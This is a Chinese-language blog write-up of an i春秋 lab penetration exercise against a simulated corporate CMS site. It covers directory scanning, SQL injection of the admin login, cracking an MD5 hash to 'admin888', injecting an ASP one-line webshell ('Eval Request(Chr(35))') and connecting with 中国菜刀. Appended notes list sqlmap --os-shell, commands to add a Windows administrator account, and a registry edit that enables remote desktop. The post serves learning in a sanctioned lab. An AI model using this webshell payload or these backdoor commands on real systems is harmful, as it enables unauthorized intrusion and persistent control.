【我很简单,请不要欺负我】模拟环境渗透详细记录
首先感谢i春秋提供的模拟环境,实验内容记录如下,部分步骤参考了官方攻略
实验地址如下:
https://www.ichunqiu.com/racing/54399
下面开始实验内容记录:
实验环境构造完毕,提示我们目标网站为www.test.ichunqiu
其实打开网站有个很明显的信息就出来了,魅力企业网站管理系统,百度一下,很多,源码都开放了,下载一份,可疑了解其文件配置基本格式
右下角的机器人开始了第一个问题
这个还是很简单的,虽然没用过,百度了下可知答案为漏洞扫描工具
接下来就是第二个问题了
得,开始x站
x站第一步,扫目录,一般ctf中可能会关注到.svn,robot.txt,vim编辑器导致的.vim后缀等等
看过各个牛逼的大佬们的渗透思路中,一般扫目录是找后台登录界面,即网站管理者的登录页面
我自己用的是北极熊,虚拟环境中提供的扫目录工具,熟悉一点的当然是众所周知的御剑了,话不多说,御剑开扫
(注:实验中遇到的各个工具不做具体说明操作,自己百度教程)
把几个可疑的都打开看了一下,最后确定是www.test.ichunqiu/admin/login.asp
这里有个admin,password,一开始想bp看看,然后sqlmap试试的,话说提供的工具中啥都没找到,好吧,又得用新工具,在工具包注入文件夹看到了一个稍微熟悉点的明小子,听过,没遇到过,百度了下基本用法,开工:
工具使用略过,直接到登录页面开撸
瞬间怀疑人生了就,莫非我注入了一个假的数据库!!!参考官方答案,原来这里还有个md5加密= =||,找了个网站进行解密,第一个很容易,admin888,另一个要不解不开,要不要收费,官方也只解了一个admin888
再次登录,bingo!
答题,没毛病,admin888,
于是又出现了第三题,,,,本来以为都结束了,看来是我太年轻
啧啧啧,webshell,对萌新来说这可是个新名词,百度了一下解释
webshell,顾名思义:web指的是在web服务器上,而shell是用脚本语言编写的脚本程序,webshell就是就是web的一个管理工具,可以对web服务器进行操作的权限,也叫webadmin。webshell一般是被网站管理员用于网站管理、服务器管理等等一些用途,但是由于webshell的功能比较强大,可以上传下载文件,查看数据库,甚至可以调用一些服务器上系统的相关命令(比如创建用户,修改删除文件之类的),通常被黑客利用,黑客通过一些上传方式,将自己编写的webshell上传到web服务器的页面的目录下,然后通过页面访问的形式进行入侵,或者通过插入一句话连接本地的一些相关工具直接对服务器进行入侵操作。
好吧,到此卡主了,萌新心里痛,开始了跟着答案做的阶段
webshell答案给的是在网站名字那里修改,加上一句话木马
"%><%Eval Request(Chr(35))%><%'一开始没懂啥意思,看了不少资料,然后自己瞎试了试“”之类的东西,算是理解了这句话,
边上的那些符号是起闭合作用的,
Eval是执行函数,char(35)指的是#
反正联合起来的意思就是以后#参数带的代码都可以直接被服务器执行(很拗口啊,结合百度理解下吧,博主只是萌新,见谅,见谅)
懂了这个意思后就自己尝试咯
换了个地方,自己把参数换成了a
后面的用中国菜刀,当然,我也跟着更换了地址
没毛病,点击就连接进了服务器文件库
第三题答案也出来了,修改文件配置
第四题
最后一题了,目标服务器,按照官方答案一步步结束了(详情见博客上分链接i春秋官方答案)
这里补充个以前sqlmap的学习笔记:
sqlmap.py - u "url" --os-shell 拿到权限后 os-shell
Net user 查看本机的用户列表
Net user "用户名" "密码" /add 添加用户
Net localgroup administrators XXX/add 将用户添加到administrators中
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal "" Server/v fDenyTSConnections /t REG_DWORD /d 00000000 /f
修改注册表开启远程桌面端口3389WIN+R mstsc 远程桌面连接 其实感觉吧,万变不离其宗,原理也差不多,总结至此,有问题欢迎一起讨论~
【我很简单,请不要欺负我】模拟环境渗透详细记录相关推荐
- Win7安装很简单-孙宇彤-专题视频课程
Win7安装很简单-1908人已学习 课程介绍 本课程是LTE学习大使孙宇彤老师针对大家的需求专门开发的课程,是<Win10安装很简单>的姐妹课程. 本课程详细介绍了win ...
- 【i春秋综合渗透训练】我很简单,请不要欺负我
[i春秋综合渗透训练]我很简单,请不要欺负我 摸了几天的?了,主要是不知道该干嘛~~ CTF题目不想做,只想玩玩英雄联盟,玩玩渗透靶机这亚子! 个人觉得不能这样混下去了,于是又来到了i春秋,发现除了C ...
- html案例:模拟一个很简单的聊天框
html案例:模拟一个很简单的聊天框 实现的代码如下: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "htt ...
- 「镁客·请讲」exands卢国鸣:商业WIFI,看似很简单实际非常难
WIFI不稳定,在以往影响的可能只是顾客体验,但现在还会影响点单.移动支付.后厨管理等核心业务. 2001年开始,卢国鸣带领着他的团队开始进军商业WIFI,2007年开始运营某知名咖啡连锁品牌的门店W ...
- ---------很简单的 一道 堆栈问题-------
1098: 括号配对问题 时间限制: 1 Sec 内存限制: 128 MB 提交: 9 解决: 5 [提交][状态][讨论版] 题目描述 现在,有一行括号序列,请你检查这行括号是否配对.输入 第一行输 ...
- 用java调用.net的wcf其实还是很简单的
前些天和我们的一个邮件服务商对接,双方需要进行一些通讯,对方是java团队,而作为.net团队的我们,只能公布出去的是一个wcf的basicbinding,想不 到问题来了,对方不知道怎么去调用这 ...
- python selenium 下载文件_Python Selenium —— 文件上传、下载,其实很简单
很多selenium学习者被浏览器弹出的文件上传.下载框折磨的痛不欲生,今天博主就带你们轻松搞定上传和下载问题. 上传 上传弹框 文件上传是所有UI自动化测试都要面对的一个头疼问题,要处理这个问题,我 ...
- STM32 之十 供电系统及内部参照电压(VREFINT)使用及改善ADC参考电压,内部参照电压的具体方法,只有在STM32F0x芯片的参考手册中才能找到,其他MCU的参考手册都是很简单的说明
STM32 之十 供电系统及内部参照电压(VREFINT)使用及改善ADC参考电压 ZCShouEXP 2018-12-21 10:50:33 16404 收藏 32 展开 问题 今天在使用 ...
- 自定义控件其实很简单 五
最近龙体欠安,很多任务都堆着,虽说如此,依然没有停下学习的步伐,虽然偶尔还会有点头痛,但是孤依旧在学习--自赞一个~ 在1/3中我们结束了全部的Paint方法学习还略带地说了下Matri的简单用法,这 ...
最新文章
- 几行代码实现神奇移动的过渡动画
- 实时计字数提醒的文本框
- Spring Session实战2
- SAP ABAP DDICSAP ABAP DDIC table runtime object table runtime object
- CDQZ_Training 2012-05-24 聪明的打字员
- 使用macOS自带convert,sips命令快速处理图片及转换图片格式
- 借助neo4j-admin导入csv文件构建实体与联系
- 千亿市场空间开启!网络安全开启新纪元步入黄金时代
- 《配置管理最佳实践》——2.12 构建工程的前景
- ZOJ 2760 How Many Shortest Path 最大流+floyd求最短路
- 如何优化你的布局层级结构之RelativeLayout和LinearLayout及FrameLayout性能分析
- spring boot访问zul页面总是变为下载页面
- 【libjpeg-turbo】安装指南[mac版]
- python 极坐标图_Python中的极坐标图问题,未考虑角度
- VBox虚拟机安装Ubuntu
- 尽量使用unity引擎的Random随机数
- 模电学习笔记(七)——差分放大器电路(减法器)
- fluent p1模型_FLUENT中的辐射模型
- web页面之弹出窗口
- 数字化转型,我只推荐看这两本书